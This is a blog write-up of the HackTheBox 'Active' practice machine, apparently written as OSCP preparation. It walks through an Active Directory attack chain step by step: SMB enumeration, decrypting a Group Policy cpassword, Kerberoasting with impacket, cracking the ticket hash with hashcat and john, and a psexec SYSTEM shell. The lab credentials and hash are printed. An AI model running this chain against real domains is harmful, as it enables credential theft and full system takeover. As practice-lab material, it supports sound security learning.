ACTIVE — HackTheBox WriteUp

This box is a part of TJnull’s list of boxes. I am doing these boxes as a part of my preparation for OSCP. I will be sharing the writeups of the same here as well.

Do a rustscan to check for open ports:

A lot of ports, hmm… ok. Port 88 is open so we can maybe try Kerberoasting in this machine. Anyways, let’s check out SMB first.

smbclient -L \\\\active.htb\\

We can read files in the Replication share.

smbclient \\\\active.htb\\Replication

Next thing I did was, to download all the files and directories from here, with the following commands:

smb: \> recurse ONsmb: \> prompt OFFsmb: \> mget *

While exploring, I found this file : active.htb/Policies/{31B2F340–016D-11D2–945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

As it can be seen, we have found username and a password. The password is in encrypted format.
To learn more about the encryption, you can refer here.
To decrypt this password, I used gpp-decrypt.

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

I got the password as: GPPstillStandingStrong2k18.
I looked up the internet for some articles and videos on Kerberoasting, I found these quite helpful :

Now, let’s check for the SPNs by this command:

impacket-GetUserSPNs -dc-ip 10.129.182.255 active.htb/SVC_TGS

So, we do have an SPN with name as Administrator. Now, let’s try and get the password hash:

impacket-GetUserSPNs -dc-ip 10.129.182.255 active.htb/SVC_TGS -request

We get this password hash:

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$654882e8b51c7071b18b1d3ff7b6af2f$8bae10679f9143d6aa659b15f3961ed501b05db8f71dc3afe896581e795b63eb8c65317e0cd737bc18a7e8e860f72f501236e41d7b27e500818f211f2f1819d073e185759c31a3b700f94e23756d07babba640a1a0ab211e91f1a9bfa2c83c294b245a5f152a0273adeb821b5dba70ebe976a61d1da09a324cde5ce46ddbd0b78a6743c17c61dd330ea421e7759e7bfe31c21d66b2d05a72ab07e0b19ef3d91e37e26033eb556207a74ac6d0246f42892f5b023569518a7e8b9ff1aebb35ecad1389ab0f7e69f9c017032bf828520d28e1576c627b53e4d533d71cebb4a8b1bf7740b4e233011a6fdca06236a865593da547aff61d2feec18f84ce56c21539e2de9c3b922f578b20184171c6acd9f7a9f346a7a6d529483da7c7adca7d16c08cf5b5987f20e6a9d621c942b2226965e74d245ed9dad9020027bfbd156be9e95f8f2e307986650de07d786c977159c723ad97968940feb178ee9f8885c3f5ee3a0aaae7584d5c5413f1176ed3f325b109d5a5fd1a0368f066f4023686a4ef3dbbbcf0d2b5b0ffe3217938b5590a3f31fd16b238681f2ee32e74c5781209690dbe8db721dc97be36b7879c687dc68925270c3d5a302498f3c1476907f041aa8211c79c62284c0951efea49ce505aa98462d0e01ba8078152b42503edaf93eee6f9595448dff53d269df0e0368da774874e7691f62d8805792b8b8c06178a6895f6c8ea357435d9d4a548bb7e185b8075cb0b2e060377dc53e89154fd522bf8d2558760d5c3eb68b276413ff5d383a079ab0b6a542b0af19a0692c979f83229074c859139c4b8398dae01b9e818f6fb3d8d08d572402c69307634f93bd0d772e0d1f325c7860e01884b73244e584cde946200727111a7a94d1b25199d0ec0dbe34f58065857fcd42dc38eb0e30254e48688d0ef42c5d11929cfd7a66915ab608989d5918f06c3c2018291f3bc088fb5eba6e768bb20a623cbd568ab68c6c4c513c1fd511243c0c1a5b104973d0b87b1ef73f298c70b7d35e7bc493c426ff9271c69153550a317e0d2bb12d1d8e370e83fe86fa8fc5c0d073dd95785f7f3e937b1844fafe2e70ce4bd219789e3698510f64e5c9bd434da3d6261bbce52e4b654083d59d529a5b5a7587d90dae17fe49bdf41a80f1e7bf3d438c98f3acb2bd7425deadd24ddf63a6092b2cd41339f6f7694df5139715b791dd689cabbd07e112318738e0807f256e65e318d996271ccd0547be0e6e5ba689914ac1b39

[NOTE: If you get an error like “[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)” while running, try killing the ntp or ntpupdate process using its Process ID, then run:
ntpdate 10.129.182.255
]

Let’s crack the password using hashcat:

.\hashcat.exe -m 13100 -a 0 .\hash.txt .\wordlists\rockyou.txt --force

I ran hashcat on windows, you can run it on your Linux machine as well. Either check the hashcat.potfile or run the above command with the show tag to see the password, i.e., :

.\hashcat.exe -m 13100 -a 0 .\hash.txt .\wordlists\rockyou.txt --force --show

We get the password as : Ticketmaster1968
You can crack the password using john as well. This is the command:

john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Next, let’s try logging in to SMB using the creds we just found:

smbclient \\\\active.htb\\ADMIN$ -U Administrator

So, great! We are logged in to SMB. Ummm… I didn’t find anything useful in the ADMIN$ share, let’s try some other.

smbclient \\\\active.htb\\Users -U Administrator

You can also connect to the C$ share, that it just one directory parent to the Users share. Nevertheless, you can get the user and root flags from here as well, but we are gonna enumerate a little further and try to get a shell. Run this:

impacket-psexec active.htb/Administrator:Ticketmaster1968@active.htb

And, we have got a shell as nt authority\system! Get user.txt from C:\Users\SVC_TGS\Desktop\user.txt and root.txt from C:\Users\Administrator\Desktop\root.txt.

We have successfully pwned the box!

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

CS371p Spring 2021: Final Entry

Why do I need Serverless 360

Dockerized Backend Server — AwesomePhotoApp

ANU #81 — New Payment Updates and New Support Language

Twig : PHP Template engine

Floyd Warshall Algorithm

Find minimum and maximum

[Android] DataBinding-ktx 5.0.0 and ViewBinding-ktx 1.0.0 Released

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Himanshu Das

Himanshu Das

More from Medium

Shocker | HackTheBox writeup

HackTheBox: Horizontall Writeup

SQL injection Union attack: Determining the number of columns required in an SQL injection UNION…

Basic Pentesting | TryHackMe Walkthrough